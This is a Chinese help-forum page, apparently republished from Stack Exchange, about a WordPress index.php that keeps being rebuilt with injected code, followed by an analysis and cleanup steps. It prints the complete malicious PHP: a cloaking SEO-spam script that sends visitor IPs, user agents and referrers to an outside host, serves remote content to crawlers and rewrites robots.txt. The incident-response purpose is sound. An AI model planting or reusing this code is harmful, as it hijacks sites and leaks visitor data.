You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

cPanel环境下WordPress站点自动生成恶意index.php文件求助

问题:Godaddy cPanel VPS上WordPress站点index.php被恶意篡改且自动重建,访问报500错误

我们在搭载cPanel的Godaddy VPS服务器上搭建了WordPress站点,站点目录下的index.php文件会被自动生成或篡改,删除后会自动重建,完全无法控制该文件及对应目录。访问该文件时会出现HTTP 500错误,以下是自动生成的index.php代码:

<?php $group_num = 'z9126zn';
$inter_domain = 'http://' . $group_num . '.lievful.quest';
function curl_get_contents($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}

function getServerCont($url, $data = array())
{
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}

function is_crawler($agent)
{
    if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
        return true;
    } else {
        return false;
    }
}

function check_refer($refer)
{
    if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
        return true;
    } else {
        return false;
    }
}

$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
    $href1 = $http . $domain . $self;
} else {
    $href1 = $http . $domain;
}
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (substr($req_uri, -6) == 'robots') {
    $robots_cont = getServerCont($url_robots, $data1);
    define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
    file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
    $robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
    if (strpos($robots_cont, "Crawl-delay:3")) {
        echo 'robots.txt file create success!';
    } else {
        echo 'robots.txt file create fail!';
    }
    exit;
}
if (substr($req_uri, -4) == '.xml') {
    if (strpos($req_uri, "pingsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        $str_cont_arr = explode(",", $str_cont);
        $str_cont_arr[] = 'sitemap';
        for ($k = 0; $k < count($str_cont_arr); $k++) {
            if (strpos($href1, ".php") > 0) {
                $tt1 = '?';
            } else {
                $tt1 = '/';
            }
            $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
            $data_new = 'https://www.google.com/ping?sitemap=' . $http2;
            $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
            if (stristr(@file_get_contents($data_new), 'successfully')) {
                echo $data_new . '===&gt;Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new), 'successfully')) {
                echo $data_new . '===&gt;Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@file_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===&gt;Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===&gt;Submitting Google Sitemap: OK' . PHP_EOL;
            } else {
                echo $data_new1 . '===&gt;Submitting Google Sitemap: fail' . PHP_EOL;
            }
        }
        exit;
    }
    if (strpos($req_uri, "allsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    if (strpos($req_uri, ".php")) {
        $word4 = explode("?", $req_uri);
        $word4 = $word4[count($word4) - 1];
        $word4 = str_replace(".xml", "", $word4);
    } else {
        $word4 = str_replace("/", "", $req_uri);
        $word4 = str_replace(".xml", "", $word4);
    }
    $data1['word'] = $word4;
    $data1['action'] = 'check_sitemap';
    $check_url4 = getServerCont($url_words, $data1);
    if ($check_url4 == '1') {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    $data1['action'] = "check_words";
    $check1 = getServerCont($url_words, $data1);
    if (strpos($req_uri, "map") > 0 || $check1 == '1') {
        $data1['action'] = "rand_xml";
        $check_url4 = getServerCont($url_words, $data1);
        header("Content-type:text/xml");
        echo $check_url4;
        exit;
    }
}
if (strpos($req_uri, ".php")) {
    $main_shell = $http . $ser_name . $self;
    $data1['main_shell'] = $main_shell;
} else {
    $main_shell = $http . $ser_name;
    $data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
    $data1['referer'] = $referer;
    $data1['ip'] = $client_ip;
    $data1['user_agent'] = $user_agent;
    $data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $refer_content = getServerCont($jump1, $data1);
    if ($refer_content != "404") {
        echo $refer_content;
        exit;
    }
    $bot=false;
}
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
    $data1['http_user_agent'] = $user_agent;
    $get_content = getServerCont($indata1, $data1);
    if ($get_content == "404") {
        header('HTTP/1.0 404 Not Found');
        exit;
    } else if ($get_content == "500") {
        header("HTTP/1.0 500 Internal Server Error");
        exit;
    } else if ($get_content == "blank") {
        echo '';
        exit;
    } else {
        echo $get_content;
        exit;
    }
} ?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

代码分析

这段是恶意黑帽SEO脚本,核心行为包括:

  • 向第三方恶意服务器发送站点访问数据(IP、UA、来源链接等)
  • 根据访问来源(如日本站点、谷歌)或爬虫UA返回恶意内容,劫持正常访问
  • 自动生成篡改后的robots.txt和恶意sitemap文件,干扰搜索引擎抓取
  • 触发500错误的原因是脚本请求第三方服务器失败时,会强制返回500状态码

解决步骤

1. 终止恶意进程与定时任务

  • 通过cPanel终端或SSH登录服务器,执行top或htop命令,查找持续占用资源或修改文件的异常PHP/未知进程,执行kill -9 [进程ID]终止。
  • 检查定时任务:cPanel中进入Cron Jobs,或SSH执行crontab -l,删除所有可疑的定时任务,防止脚本自动重建。

2. 锁定关键文件与修复权限

  • 删除恶意index.php,替换为官方干净版本(代码见下文),然后执行chattr +i index.php(仅Linux系统)锁定文件,禁止任何修改。后续恢复正常后可执行chattr -i index.php解锁。
  • 重置站点目录权限:目录设为755,文件设为644,执行命令:
    find /path/to/your/wp -type d -exec chmod 755 {} \;
    find /path/to/your/wp -type f -exec chmod 644 {} \;
    

3. 清除恶意代码与扫描漏洞

  • 使用WordPress安全插件(如Wordfence、Sucuri)全站点扫描,清除隐藏在主题、插件、wp-config.php、.htaccess中的恶意代码。
  • 检查.htaccess文件,删除可疑的Rewrite规则,恢复为WordPress默认规则。

4. 系统与站点加固

  • 立即更新WordPress核心、所有主题和插件到最新版本,修复已知漏洞。
  • 更换WordPress管理员密码,禁用不必要的用户账号,开启两步验证。
  • 联系Godaddy技术支持,告知服务器被入侵,请求协助排查cPanel、SSH等层面的漏洞。

5. 恢复干净的index.php

替换为官方WordPress默认的index.php内容:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

内容的提问来源于stack exchange,提问作者Priyank Modi

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.16 22:25:17